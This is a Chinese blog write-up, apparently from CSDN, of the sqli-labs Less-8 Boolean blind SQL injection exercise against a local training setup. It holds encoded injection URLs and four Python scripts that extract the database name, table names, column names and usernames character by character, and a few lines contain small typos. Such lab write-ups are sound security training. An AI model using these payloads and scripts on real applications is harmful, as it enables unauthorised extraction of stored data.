sqli/less-8

第八关布尔注入

这里是使用phpstudy快速搭建的环境

把sqli文件放在www下就能有环境了

判断闭合字符,为’原因’恒正确恒错误做了回显

判断数据库个数为5个

http://127.0.0.1/sqli/Less-8/?id=1%27%20and%20(select%20count(schema_name)%20from%20information_schema.schemata)%3E5--%20+

判断第一个数据库长度,为18

http://127.0.0.1/sqli/Less-8/?id=1%27%20and%20(select%20length(schema_name)%20from%20information_schema.schemata%20limit%200,1)%3E17%20--%20+

获取数据名字第一个字母举个例子

http://127.0.0.1/sqli/Less-8/?id=1%27%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%200,1)1,1))%3E1%20--%20-

这里随后的东西重复性,都是求多少,求长度,求名,还是向普通sql注入一样,数据库表字段数据这个步骤注入

由于布尔注入麻烦直接使用python脚本(爆数据库和表我借鉴的随后爆字段和爆信息是我自己改的)

这里要使用,就改下ip地址就行

借鉴作者:白塔河冲浪手

原理:http://127.0.0.1/sqli/less-8/?id=1' and substr(database(),%d,1)='字母' -- +

##sql盲注 长度为8

import requests

name = ''

for j in range(1,9):

for i in 'sqcwertyuioplkjhgfdazxvbnm':

url = "http://127.00.1/sqli/Less-8/?id=1' and substr(database(),%d,1)='%s'" %(j,i)

# print(url+'%23')

r = requests.get(url+'%23')

if 'You are in' in r.text:

name = name+i

print(name)

break

print('database_name:',name)

原理:http://127.0.0.1/sqli/less-8/?id=1' and substr((select table_name from information_schema.tables where tables_schema=security limit 变量,1),变量位,1 )='变量位'" %(k,j,i)

//

##sql盲注 四个表 长度为最大为8

import requests

name = ''

for k in range(0,5):

for j in range(1,10):

for i in 'sqcwertyuioplkjhgfdazxvbnm':

url = "http://127.0.0.1/sqli/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'" %(k,j,i)

# print(url+'%23')

r = requests.get(url+'%23')

if 'You are in' in r.text:

name = name+i

print(name)

break

print('table_name:',name)

///user表有三个字段,字段长度最大为8

import requests

name = ''

for k in range(0,4):

for j in range(1,10):

for i in 'sqcwertyuioplkjhgfdazxvbnm':

url = "http://127.0.0.1/sqli/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit %d,1),%d,1)='%s'" %(k,j,i)

# print(url+'%23')

r = requests.get(url+'%23')

if 'You are in' in r.text:

name = name+i

print(name)

break

print('column_name:',name)

//这里直接查找securiity中users表中username文件

import requests

name = ''

for k in range(0,14):

for j in range(1,10):

for i in '1234sqcwertyuioplkjhgfdazxvbnm':

url = "http://127.0.0.1/sqli/Less-8/?id=1' and substr((select username from security.users limit %d,1),%d,1)='%s' -- +" %(k,j,i)

# print(url+'%23')

r = requests.get(url+'%23')

if 'You are in' in r.text:

name = name+i

print(name)

break

print('column_name:',name)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值